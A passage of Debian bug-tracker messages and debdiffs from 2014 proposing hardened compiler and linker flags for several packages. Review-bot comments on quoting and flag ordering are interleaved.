$(DISCOVERY_SRCS) \ iscsid.o session_mgmt.o discoveryd.o @@ -30,10 +30,10 @@ clean: rm -f *.o $(PROGRAMS) .depend $(LIBSYS) -Index: open-iscsi/utils/Makefile +Index: open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile === open-iscsi.orig/utils/Makefile 2013-11-05 20:56:40.013418719 +0530 -+++ open-iscsi/utils/Makefile 2013-11-05 20:56:40.009418719 +0530 +--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/Makefile open-iscsi-2.0.873+git0.3b4b4500/utils/Makefile 
@@ -1,12 +1,12 @@ # This Makefile will work only with GNU make. @@ -49,3 +49,16 @@ clean: rm -f *.o $(PROGRAMS) .depend +Index: open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in +=== +--- open-iscsi-2.0.873+git0.3b4b4500.orig/utils/open-isns/Makefile.in open-iscsi-2.0.873+git0.3b4b4500/utils/open-isns/Makefile.in +@@ -13,7 +13,7 @@ VARDIR = $(INSTALL_ROOT)$(vardir) + + CC = @CC@ + CPPFLAGS= @CPPFLAGS@ +-CFLAGS = @CFLAGS@ -I. ++CFLAGS = @CFLAGS@ -I. -fPIC + LDFLAGS = @LDFLAGS@ + + LIB = libisns.a diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series --- open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series 2014-08-20 15:53:55.0 +0200 +++ open-iscsi-2.0.873+git0.3b4b4500/debian/patches/series 2014-10-07 21:42:37.0 +0200 @@ -1,4 +1,5 @@ 01_spelling-errors-and-manpage-hyphen-fixes.patch 02_make-iscsistart-a-dynamic-binary.patch +03_hardened-build-flags.patch 04_fix_iscsi_path.patch 05-disable-iscsiuio.patch diff -Nru open-iscsi-2.0.873+git0.3b4b4500/debian/rules open-iscsi-2.0.873+git0.3b4b4500/debian/rules --- open-iscsi-2.0.873+git0.3b4b4500
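Review bot: the new debian/changelog entry says the refresh enables "-dPIC" for the utils/open-isns lib, but the flag actually appended in the utils/open-isns/Makefile.in hunk is -fPIC ("+CFLAGS = @CFLAGS@ -I. -fPIC"). Please correct the changelog text to -fPIC so the entry matches the change it records. The entry could also say why the static libisns.a needs position-independent objects (it is linked into binaries built as PIE), since that is the reason the refresh touches a third Makefile.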
Bug#756906: nfs-utils: please use more hardening features
Hello,

Applying the attached seems to be sufficient to enable hardened build flags. Maybe interesting to enable PIE and BINDNOW too.

diff -Nru nfs-utils-1.2.8/debian/rules nfs-utils-1.2.8/debian/rules --- nfs-utils-1.2.8/debian/rules 2014-08-13 02:12:43.0 +0200 +++ nfs-utils-1.2.8/debian/rules 2014-10-04 16:34:06.0 +0200 @@ -1,8 +1,11 @@ #! /usr/bin/make -f +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk + # Parsing of DEB_BUILD_OPTIONS flags. # Note that nostrip is handled automatically by debhelper. -CFLAGS := -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \ +CFLAGS += -g -Wall -DPIPEFS_DIR=\\\/run/rpc_pipefs\\\ \ -DGSSD_PIPEFS_DIR=\\\/run/rpc_pipefs\\\ ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS)))
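Review bot: with buildflags.mk now included at the top of debian/rules, the noopt conditional that begins on the last context line of the hunk ("ifneq (,$(filter noopt,$(DEB_BUILD_OPTIONS)))") looks redundant, because dpkg-buildflags already honours noopt in DEB_BUILD_OPTIONS; if its body still appends an -O level after the "CFLAGS +=" line, that level overrides the one dpkg-buildflags supplied. The body is not visible here, so please check it and drop the conditional if it only sets -O0/-O2. The same applies to "-g" in "CFLAGS += -g -Wall", which duplicates the dpkg-buildflags default.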
Bug#763687: Please enable hardened build flags
On Thu, Oct 02, 2014 at 10:14:16PM +0200, folkert wrote:
>> Package: multitail
>>
>> Please enable hardening build flags on your package; adding:
>> DPKG_EXPORT_BUILDFLAGS = 1
>> include /usr/share/dpkg/buildflags.mk
>
> Are there any indications that multitail has security problems?

Not particular ones, but enabling *FLAGS (which contain security hardening flags now) is a release goal and maybe good for future recompilation archive compiler options. The priority is to enable flags to network daemons, DSA, priority or important and interpreters packages and later on the whole archive.

> Folkert van Heusden

--
Guillaume Delacour
Bug#763687: Please enable hardened build flags
Package: multitail
Version: 6.2.1-1
Severity: important
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

Hello,

Please enable hardening build flags on your package; adding:

DPKG_EXPORT_BUILDFLAGS = 1
include /usr/share/dpkg/buildflags.mk

In debian/rules is sufficient in the actual package state, or will be automatic if you switch to debhelper version = 9.

I've made some tests after building multitail with hardened flags and encountered no problem at this time.

More information available about hardening flags: https://wiki.debian.org/ReleaseGoals/SecurityHardeningBuildFlags
Bug#763154: Hardening options incomplete: missings CPPFLAGS and LDFLAGS
Package: postfix-gld
Version: 1.7-5
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

Hello,

As you previously enabled CFLAGS, I've just refreshed your patch debian/patches/01 to pass {CPP,LD}FLAGS to make in debian/rules and updated upstream Makefile.in to use it.

I don't use postfix-gld so it maybe needs more intensive tests than I've made.

diff -Nru postfix-gld-1.7/debian/changelog postfix-gld-1.7/debian/changelog --- postfix-gld-1.7/debian/changelog 2014-03-16 16:53:11.0 +0100 +++ postfix-gld-1.7/debian/changelog 2014-09-28 11:13:08.0 +0200 @@ -1,3 +1,10 @@ +postfix-gld (1.7-5.1) unstable; urgency=medium + + * Non-maintainer upload. + * Refresh debian/patches/01 to pass CPPFLAGS and LDFLAGS to gcc calls + + -- Guillaume Delacour g...@iroqwa.org Sun, 28 Sep 2014 11:06:30 +0200 + postfix-gld (1.7-5) unstable; urgency=medium * Fixed typo in README.Debian. diff -Nru postfix-gld-1.7/debian/patches/01 postfix-gld-1.7/debian/patches/01 --- postfix-gld-1.7/debian/patches/01 2010-04-19 00:09:12.0 +0200 +++ postfix-gld-1.7/debian/patches/01 2014-09-28 11:12:46.0 +0200 @@ -1,8 +1,11 @@ 
From: Santiago Vila sanv...@debian.org Subject: Changed Makefile.in to support DEB_BUILD_OPTIONS +Last-Update: 2014-09-28 a/Makefile.in -+++ b/Makefile.in +Index: postfix-gld-1.7/Makefile.in +=== +--- postfix-gld-1.7.orig/Makefile.in postfix-gld-1.7/Makefile.in @@ -1,23 +1,24 @@ all: gld @@ -11,27 +14,27 @@ gld: cnf.o server.o sql.o sockets.o greylist.o gld.h - @CC@ -O2 @DEFS@ -Wall server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld - strip gld -+ @CC@ $(CFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld ++ @CC@ $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) @DEFS@ server.o sql.o sockets.o cnf.o greylist.o @LIBS@ @SQL_LIBS@ -o gld sockets.o: sockets.c sockets.h - @CC@ -O2 @DEFS@ -Wall -c sockets.c -+ @CC@ $(CFLAGS) @DEFS@ -c sockets.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c sockets.c cnf.o: cnf.c gld.h - @CC@ -O2 @DEFS@ -Wall -c cnf.c -+ @CC@ $(CFLAGS) @DEFS@ -c cnf.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c cnf.c greylist.o: greylist.c gld.h - @CC@ -O2 @DEFS@ -Wall -c greylist.c -+ @CC@ $(CFLAGS) @DEFS@ -c greylist.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c greylist.c server.o: server.c gld.h - @CC@ -O2 @DEFS@ -Wall -c server.c -+ @CC@ $(CFLAGS) @DEFS@ -c server.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ -c server.c sql.o: sql.c - @CC@ -O2 @DEFS@ @SQL_CFLAGS@ -Wall -c sql.c -+ @CC@ $(CFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c ++ @CC@ $(CFLAGS) $(CPPFLAGS) @DEFS@ @SQL_CFLAGS@ -c sql.c clean: rm -f gld *.o diff -Nru postfix-gld-1.7/debian/rules postfix-gld-1.7/debian/rules --- postfix-gld-1.7/debian/rules 2014-03-15 12:00:00.0 +0100 +++ postfix-gld-1.7/debian/rules 2014-09-28 11:15:49.0 +0200 @@ -16,7 +16,7 @@ build: ./configure --prefix=/usr --with-$(DATABASE) - $(MAKE) CFLAGS=$(CFLAGS) + $(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) touch build clean:
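Review bot: the debian/rules hunk passes CPPFLAGS=$(CPPFLAGS) and LDFLAGS=$(LDFLAGS) to $(MAKE), but nothing in this debdiff shows where debian/rules sets those two variables (no buildflags.mk include or dpkg-buildflags call is added), so they may expand to nothing and the refreshed Makefile.in would then build exactly as before. Please confirm that debian/rules obtains CPPFLAGS and LDFLAGS from dpkg-buildflags, or add that in the same upload. In the refreshed patch, $(LDFLAGS) is correctly limited to the link rule for gld and $(CPPFLAGS) is added to every compile rule, which is what FORTIFY_SOURCE needs.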
Bug#763158: Hardening options incomplete: missings CPPFLAGS and LDFLAGS
Package: portsentry
Version: 1.2-13
Severity: important
Tags: patch
User: hardening-disc...@lists.alioth.debian.org
Usertags: goal-hardening

Hello,

Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS.

diff -Nru portsentry-1.2/debian/changelog portsentry-1.2/debian/changelog --- portsentry-1.2/debian/changelog 2012-01-14 15:28:24.0 +0100 +++ portsentry-1.2/debian/changelog 2014-09-28 11:34:24.0 +0200 @@ -1,3 +1,11 @@ +portsentry (1.2-13.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass {CPP,LD}FLAGS to make and patch upstream +Makefile to use them + + -- Guillaume Delacour g...@iroqwa.org Sun, 28 Sep 2014 11:29:22 +0200 + portsentry (1.2-13) unstable; urgency=low * Switch to dpkg-source 3.0 (quilt) format diff -Nru portsentry-1.2/debian/patches/01_dpkg-buildflags.patch portsentry-1.2/debian/patches/01_dpkg-buildflags.patch --- portsentry-1.2/debian/patches/01_dpkg-buildflags.patch 1970-01-01 01:00:00.0 +0100 +++ portsentry-1.2/debian/patches/01_dpkg-buildflags.patch 2014-09-28 11:40:10.0 +0200 
@@ -0,0 +1,17 @@ +Author: Guillaume Delacour g...@iroqwa.org +Description: Patch upstream Makefile to use {CPP,LD}FLAGS +Last-Update: 2014-09-28 + +Index: portsentry-1.2/Makefile +=== +--- portsentry-1.2.orig/Makefile portsentry-1.2/Makefile +@@ -107,7 +107,7 @@ linux: + debian-linux: + SYSTYPE=debian-linux + @echo Making $(SYSTYPE) +- $(CC) $(CFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \ ++ $(CC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -DLINUX -DDEBIAN -DSUPPORT_STEALTH -o ./portsentry ./portsentry.c \ + ./portsentry_io.c ./portsentry_util.c $(LIBS) + + diff -Nru portsentry-1.2/debian/patches/series portsentry-1.2/debian/patches/series --- portsentry-1.2/debian/patches/series 2012-01-14 15:27:18.0 +0100 +++ portsentry-1.2/debian/patches/series 2014-09-28 11:33:41.0 +0200 @@ -2,3 +2,4 @@ 00_fix_portsentry.c.patch 00_fix_README.install.patch 00_fix_Makefile.patch +01_dpkg-buildflags.patch diff -Nru portsentry-1.2/debian/rules portsentry-1.2/debian/rules --- portsentry-1.2/debian/rules 2012-01-14 15:27:18.0 +0100 +++ portsentry-1.2/debian/rules 2014-09-28 11:41:07.0 +0200 @@ -9,6 +9,9 @@ # Uncomment this to turn on verbose mode. export DH_VERBOSE=1 +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk + DEST=`pwd`/debian/`dh_listpackages` ETCDIR=$(DEST)/etc/portsentry PPP=$(DEST)/etc/ppp @@ -17,13 +20,8 @@ INSTALL=install INSTALL_PROGRAM = $(INSTALL) -p -o root -g root -m 755 -CFLAGS=-Wall -g +CFLAGS+=-Wall -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) -CFLAGS += -O0 -else -CFLAGS += -O2 -endif ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s endif @@ -42,7 +40,7 @@ dh_testdir # Add here commands to compile the package. - $(MAKE) CFLAGS=$(CFLAGS) -f Makefile debian-linux + $(MAKE) CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -f Makefile debian-linux touch build-stamp
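Review bot: The header of the new debian/patches/01_dpkg-buildflags.patch has Author, Description and Last-Update but no Forwarded field, and the change it carries (adding $(CPPFLAGS) and $(LDFLAGS) to the compile line) is not Debian-specific, so it should say whether the patch was sent upstream. The Makefile hunk touches only the debian-linux target; the linux target visible in the hunk context and any others still ignore both variables. That is enough for this package because debian/rules builds debian-linux, but it is worth stating in the Description.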
Bug#763180: Hardening options incomplete: missing CFLAGS
Package: ahcpd Version: 0.53-2 Severity: normal Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, The upstream Makefile overwrites the CFLAGS variable exported by dpkg-buildflags (which is -g -O2 -fstack-protector-strong -Wformat -Werror=format-security). Please find attached a patch that fixes that. diff -Nru ahcpd-0.53/debian/changelog ahcpd-0.53/debian/changelog --- ahcpd-0.53/debian/changelog 2013-05-26 21:11:53.0 +0200 +++ ahcpd-0.53/debian/changelog 2014-09-28 15:08:19.0 +0200 @@ -1,3 +1,10 @@ +ahcpd (0.53-2.1) unstable; urgency=medium + + * Non-maintainer upload. + * Patch upstream Makefile to not overwrite dpkg-buildflags CFLAGS + + -- Guillaume Delacour g...@iroqwa.org Sun, 28 Sep 2014 15:02:21 +0200 + ahcpd (0.53-2) unstable; urgency=low * Add logrotate support diff -Nru ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff --- ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff 1970-01-01 01:00:00.0 +0100 +++ ahcpd-0.53/debian/patches/01_dont_overwrite_cflags.diff 2014-09-28 15:05:30.0 +0200 
@@ -0,0 +1,17 @@ +Author Guillaume Delacour g...@iroqwa.org +Description: Don't overwrite dpkg-buildflags CFLAGS +Last-Update: 2014-09-28 + +Index: ahcpd-0.53/Makefile +=== +--- ahcpd-0.53.orig/Makefile ahcpd-0.53/Makefile +@@ -4,7 +4,7 @@ CDEBUGFLAGS = -Os -g -Wall + + DEFINES = $(PLATFORM_DEFINES) + +-CFLAGS = $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES) ++CFLAGS += $(CDEBUGFLAGS) $(DEFINES) $(EXTRA_DEFINES) + + SRCS = ahcpd.c monotonic.c transport.c prefix.c configure.c config.c lease.c + diff -Nru ahcpd-0.53/debian/patches/series ahcpd-0.53/debian/patches/series --- ahcpd-0.53/debian/patches/series 1970-01-01 01:00:00.0 +0100 +++ ahcpd-0.53/debian/patches/series 2014-09-28 15:06:39.0 +0200 @@ -0,0 +1 @@ +01_dont_overwrite_cflags.diff
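Review bot: With CFLAGS += in the upstream Makefile, CDEBUGFLAGS (-Os -g -Wall in the hunk header context) is appended after the flags exported by dpkg-buildflags, so its -Os comes last and overrides the exported -O2, and would equally override the -O0 that noopt in DEB_BUILD_OPTIONS selects. Drop the optimisation level from CDEBUGFLAGS in the same patch, or pass a CDEBUGFLAGS without it from debian/rules. The patch header also reads "Author Guillaume Delacour" without the colon used on the Description and Last-Update fields.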
Bug#763183: Please enable hardened build flags
Package: arp-scan Version: 1.8.1-2 Severity: normal Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Upstream already compiles arp-scan with the -fstack-protector, -D_FORTIFY_SOURCE=2 and -Wformat -Wformat-security gcc flags (but LDFLAGS relro is missing); the use of dpkg-buildflags is recommended as it exports all Debian hardening *FLAGS automatically. You can just use it at the top of debian/rules:
    DPKG_EXPORT_BUILDFLAGS = 1
    include /usr/share/dpkg/buildflags.mk
Or switch to debhelper 9 to enable this automatically.
Bug#763184: FTBFS with -Werror=format-security
Source: cfengine3 Version: 3.2.4-2+nmu1 Severity: important User: debian...@lists.debian.org Usertags: hardening-format-security hardening Hello, Cfengine fails to build with dpkg-buildflags hardened flags, particularly with -Werror=format-security CFLAGS (build log attached). The buildflags were not used in your package; I've just added this to debian/rules to see the failure:
    DPKG_EXPORT_BUILDFLAGS = 1
    include /usr/share/dpkg/buildflags.mk
Bug#733588: memcached: Please update to new upstream version (1.4.20)
Unless David emits objections, I've packaged [1] the new upstream and fixed all bugs in the PTS (and also fixed the build for the arm64 port); I've had to use debhelper 9 and dh_autoreconf to easily build this version without repacking it and to provide a systemd script. I've also filled the git collab-maint repository on alioth [2] (which was created empty in January this year) with the actual version in sid, the version 1.4.20 and my Debian-related changes. [1]: http://mentors.debian.net/debian/pool/main/m/memcached/memcached_1.4.20-0.1.dsc [2]: http://anonscm.debian.org/cgit/collab-maint/memcached.git/ -- Guillaume Delacour g...@iroqwa.org
Bug#733588: memcached: Please update to new upstream version (1.4.17)
Hi, As new upstream release 1.4.20 is available, I've proposed my help to David to provide a new upstream release and try to fix as many BTS bugs as possible. -- Guillaume Delacour g...@iroqwa.org
Bug#543626: memcached.log show event_add messages
Hello, This is apparently fixed since upstream release 1.4.6 (fix race crash for accepting new connections). Sorry for the late answer. -- Guillaume Delacour g...@iroqwa.org
Bug#762331: Hardening options incomplete (CPPFLAGS, LDFLAGS)
Package: ifplugd Version: 0.28-19 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Please enable CPPFLAGS and LDFLAGS from dpkg-buildflags (patch attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS. diff -u ifplugd-0.28/debian/changelog ifplugd-0.28/debian/changelog --- ifplugd-0.28/debian/changelog +++ ifplugd-0.28/debian/changelog @@ -1,3 +1,10 @@ +ifplugd (0.28-19.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to configure + + -- Guillaume Delacour g...@iroqwa.org Sun, 21 Sep 2014 10:09:39 +0200 + ifplugd (0.28-19) unstable; urgency=low * Added interface poll delay 1sec using the new -T option. (Closes: diff -u ifplugd-0.28/debian/rules ifplugd-0.28/debian/rules --- ifplugd-0.28/debian/rules +++ ifplugd-0.28/debian/rules 
@@ -4,19 +4,14 @@ #export DH_VERBOSE=1 include /usr/share/dpatch/dpatch.make +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) DEB_HOST_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_HOST_GNU_TYPE) DEB_BUILD_GNU_TYPE ?= $(shell dpkg-architecture -qDEB_BUILD_GNU_TYPE) -CFLAGS = -Wall -g - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s endif @@ -36,7 +31,7 @@ cp -f /usr/share/misc/config.guess config.guess endif [ ! -f doc/README.html ] || mv -f doc/README.html doc/README.html.ups - ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) LDFLAGS=-Wl,-z,defs $(confopts) + ./configure --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --sysconfdir=/etc CFLAGS=$(CFLAGS) CPPFLAGS=$(CPPFLAGS) LDFLAGS=$(LDFLAGS) -Wl,-z,defs $(confopts) touch $@ build: build-stamp
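Review bot: On the ./configure line, LDFLAGS=$(LDFLAGS) -Wl,-z,defs is unquoted as shown here, so -Wl,-z,defs is no longer part of the LDFLAGS assignment (before the change it was the whole value, LDFLAGS=-Wl,-z,defs) and reaches configure as a separate argument; CFLAGS=$(CFLAGS) splits the same way once it holds more than one flag. Quote each assignment and keep -Wl,-z,defs inside the LDFLAGS quotes, then check a verbose link line for both relro and defs.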
Bug#762336: Please enable hardened build flags
Source: bandwidthd Version: 2.0.1+cvs20090917-7 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS. diff -Nru bandwidthd-2.0.1+cvs20090917/debian/changelog bandwidthd-2.0.1+cvs20090917/debian/changelog --- bandwidthd-2.0.1+cvs20090917/debian/changelog 2013-07-20 18:25:40.0 +0200 +++ bandwidthd-2.0.1+cvs20090917/debian/changelog 2014-09-21 10:39:48.0 +0200 @@ -1,3 +1,10 @@ +bandwidthd (2.0.1+cvs20090917-7.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to configure + + -- Guillaume Delacour g...@iroqwa.org Sun, 21 Sep 2014 10:27:23 +0200 + bandwidthd (2.0.1+cvs20090917-7) unstable; urgency=low * Move php5-gd to Recommends and also recommend php5 (Closes: #717042) diff -Nru bandwidthd-2.0.1+cvs20090917/debian/rules bandwidthd-2.0.1+cvs20090917/debian/rules --- bandwidthd-2.0.1+cvs20090917/debian/rules 2013-06-14 00:41:25.0 +0200 +++ bandwidthd-2.0.1+cvs20090917/debian/rules 2014-09-21 10:28:19.0 +0200 
@@ -6,6 +6,9 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk + configureoptions = --prefix=/usr --bindir=/usr/sbin/ --sysconfdir=/etc/bandwidthd/ --localstatedir=/var/lib/ p_bwdstatic = bandwidthd @@ -15,17 +18,6 @@ build_bwdpgsql = debian/bandwidthd-pgsql -CFLAGS = -Wall - -ifneq (,$(findstring debug,$(DEB_BUILD_OPTIONS))) - CFLAGS += -g -endif - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif ifeq (,$(findstring nostrip,$(DEB_BUILD_OPTIONS))) INSTALL_PROGRAM += -s endif @@ -41,7 +33,7 @@ cp -f /usr/share/misc/config.sub config.sub dh_autoreconf chmod +x configure - ./configure $(configureoptions) --disable-pgsql + $(shell dpkg-buildflags --export=cmdline) ./configure $(configureoptions) --disable-pgsql touch $@ configure-bwdpgsql: configure-bwdpgsql-stamp
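Review bot: The deleted CFLAGS block in debian/rules was the only visible place that set -Wall, and none of the added lines restore it, so the package would build with fewer warnings than before. Add CFLAGS += -Wall after the include of /usr/share/dpkg/buildflags.mk. In the visible hunks the $(shell dpkg-buildflags --export=cmdline) prefix is put on the --disable-pgsql configure call only; if the configure-bwdpgsql target is meant to rely on the exported environment alone, the first call can do the same, and a single mechanism is easier to audit.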
Bug#762336: Please enable hardened build flags
On Sunday 21 September 2014 at 16:11 +0200, Andreas Henriksson wrote:
> Hello Guillaume Delacour!
> Thanks for your patch. Have you tested it? Are you sure it doesn't break things? Too many times have I been asked to enable hardening build and then again having to re-disable it again because the submitter didn't test things at all and when problems showed up the submitter went into hiding
I don't use bandwidthd personally, so I've just installed the generated deb with hardened flags, started the daemon, left the default configuration and waited a few minutes to see a first graph with values. It may need a longer test campaign to be sure everything is OK (my desktop only has one eth0 interface). I didn't see any similar issue reported before for bandwidthd (and the fix is simple to implement), this is why I've opened this bug.
> Regards, Andreas Henriksson
-- Guillaume Delacour g...@iroqwa.org
Bug#761123: Please enable hardened build flags
Source: irssi Version: 0.8.16 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Hello, Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS. diff -u irssi-0.8.16/debian/rules irssi-0.8.16/debian/rules --- irssi-0.8.16/debian/rules +++ irssi-0.8.16/debian/rules @@ -10,6 +10,8 @@ #export DH_VERBOSE=1 include /usr/share/quilt/quilt.make +DPKG_EXPORT_BUILDFLAGS = 1 +include /usr/share/dpkg/buildflags.mk # These are used for cross-compiling and for saving the configure script # from having to guess our platform (since we know it already) @@ -24,18 +26,6 @@ MAKEFLAGS += -j$(NUMJOBS) endif - - - -CFLAGS = -Wall -g - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS += -O0 -else - CFLAGS += -O2 -endif - - CONFIGURE_SWITCHES = --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) \ --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info \ --sysconfdir=/etc \ 
@@ -50,7 +40,7 @@ dh_testdir # Add here commands to configure the package. dh_autotools-dev_updateconfig - CFLAGS=$(CFLAGS) ./configure $(CONFIGURE_SWITCHES) + $(shell dpkg-buildflags --export=cmdline) ./configure $(CONFIGURE_SWITCHES) build: build-arch build-indep
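Review bot: debian/rules now supplies the flags twice: DPKG_EXPORT_BUILDFLAGS = 1 with the buildflags.mk include already exports CFLAGS, CPPFLAGS and LDFLAGS into the environment of ./configure, and the $(shell dpkg-buildflags --export=cmdline) prefix on the configure line computes them again in a separate dpkg-buildflags run. Keep one of the two. With both, any later adjustment to the make variables (for example re-adding the -Wall that the removed CFLAGS block carried) is overridden by the freshly computed values on the configure line.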
Bug#761127: Please enable hardened build flags
Package: heirloom-mailx Version: 12.5-2 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS. diff -Nru heirloom-mailx-12.5/debian/changelog heirloom-mailx-12.5/debian/changelog --- heirloom-mailx-12.5/debian/changelog 2012-04-14 20:25:21.0 +0200 +++ heirloom-mailx-12.5/debian/changelog 2014-09-10 23:25:46.0 +0200 @@ -1,3 +1,10 @@ +heirloom-mailx (12.5-2.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to Makefile + + -- Guillaume Delacour g...@iroqwa.org Wed, 10 Sep 2014 23:16:59 +0200 + heirloom-mailx (12.5-2) unstable; urgency=low * now Provides: mail-reader (Closes: #663384), imap-client diff -Nru heirloom-mailx-12.5/debian/rules heirloom-mailx-12.5/debian/rules --- heirloom-mailx-12.5/debian/rules 2012-04-14 20:21:44.0 +0200 +++ heirloom-mailx-12.5/debian/rules 2014-09-10 23:24:08.0 +0200 
@@ -5,13 +5,10 @@ # Uncomment this to turn on verbose mode. #export DH_VERBOSE=1 -CFLAGS=-Wall -g - -ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) - CFLAGS+=-O0 -else - CFLAGS+=-O2 -endif +CPPFLAGS=$(shell dpkg-buildflags --get CPPFLAGS) +CFLAGS=$(shell dpkg-buildflags --get CFLAGS) +CFLAGS+=-Wall +LDFLAGS=$(shell dpkg-buildflags --get LDFLAGS) build: build-arch build-indep build-arch: build-stamp @@ -22,7 +19,8 @@ $(MAKE) \ PREFIX=/usr \ CFLAGS=$(CFLAGS) \ - CPPFLAGS=-D_GNU_SOURCE \ + CPPFLAGS=$(CPPFLAGS) -D_GNU_SOURCE \ + LDFLAGS=$(LDFLAGS) \ UCBINSTALL=/usr/bin/install \ IPv6=-DHAVE_IPv6_FUNCS \ STRIP=true
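Review bot: In the $(MAKE) invocation, CPPFLAGS=$(CPPFLAGS) -D_GNU_SOURCE is unquoted as shown here, so -D_GNU_SOURCE, which the old line passed as the entire value of CPPFLAGS, now sits outside the assignment and is handed to make as a separate argument instead of to the preprocessor. Quote the assignment with -D_GNU_SOURCE inside it, and quote CFLAGS and LDFLAGS likewise since both expand to several flags.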
Bug#761129: Please enable hardened build flags
Package: ldapvi Version: 1.7-9 Severity: important Tags: patch User: hardening-disc...@lists.alioth.debian.org Usertags: goal-hardening Hello, Please enable hardened build flags with dpkg-buildflags (patch attached). dpkg-buildflags handles noopt from DEB_BUILD_OPTIONS. diff -u ldapvi-1.7/debian/changelog ldapvi-1.7/debian/changelog --- ldapvi-1.7/debian/changelog +++ ldapvi-1.7/debian/changelog @@ -1,3 +1,11 @@ +ldapvi (1.7-9.1) unstable; urgency=medium + + * Non-maintainer upload. + * Use dpkg-buildflags and pass *FLAGS to configure + * Remove compilation generated files (config.status, GNUmakefile, config.h) + + -- Guillaume Delacour g...@iroqwa.org Wed, 10 Sep 2014 23:40:05 +0200 + ldapvi (1.7-9) unstable; urgency=low * Use fileencoding instead of encoding in vim modeline which makes recent diff -u ldapvi-1.7/debian/rules ldapvi-1.7/debian/rules --- ldapvi-1.7/debian/rules +++ ldapvi-1.7/debian/rules 
